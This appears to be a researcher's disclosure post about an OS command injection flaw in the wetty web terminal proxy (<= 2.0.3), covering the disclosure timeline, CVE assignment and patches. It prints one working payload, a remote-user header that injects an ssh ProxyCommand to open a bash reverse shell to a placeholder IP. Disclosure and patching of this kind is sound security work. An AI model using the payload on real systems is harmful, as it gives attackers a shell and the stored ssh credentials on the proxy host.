butlerx/wetty <= 2.0.3 RCE exploit

butlerx/wetty is a popular web terminal proxy (a browser terminal that forwards keystrokes to a local login or to an ssh session on the server side) used for CTF organization, programming learning services and administration.

The lack of validation on the username input allowed unauthenticated RCE via OS command injection (through an injected ssh option) in wetty <= 2.0.3. I found it while playing setodanoteCTF (a local CTF).

https://github.com/butlerx/wetty has no security policy, so I sent an email directly to the maintainer (butlerx). In this case the CNA could not be determined clearly, so I sent a report to MITRE, but there was no response for a long time. After that, I sent mail to Snyk to take care of the duplicate report, but I couldn't get any answer…

2022-08-15 status update (added 2024-01-05)
I received a response from MITRE in 2022-08. Unfortunately, I had to focus on my health problems until now. CVE-2021-46831 and CVE-2021-40245 were assigned for these vulnerabilities. Thanks, team.

The username parameter, submitted from the login page or via the remote-user header (so the login page is not required), is passed straight into the ssh command line and therefore accepts an ssh option as its value, e.g. remote-user: -o ProxyCommand=bash -c "bash -i >& /dev/tcp/MY_IP/PORT 0>&1". Noteworthy: this vulnerability sits between the proxy and the ssh server. ProxyCommand is executed by the ssh client on the wetty host itself, not on the ssh target, so the attacker gets a fully controlled, unsandboxed shell on the proxy server and can read the ssh credentials it holds.

Interestingly, the picoCTF service was vulnerable until my patch was accepted.

wetty 2.1.0 still allows a very restricted option injection, but there is no usable attack vector (fixed in 2.1.1 with my next patch: https://github.com/butlerx/wetty/commit/0770647af5173a76ea675af0c1c97cad1430b74a#diff-e19e62e010f8b5658ed3079d52e22b50702e63b9146dff7de93c9a5d8d38bf72).

Thanks to butlerx, Snyk and the MITRE team.

douro

Software Developer, Security Researcher

2022-05-09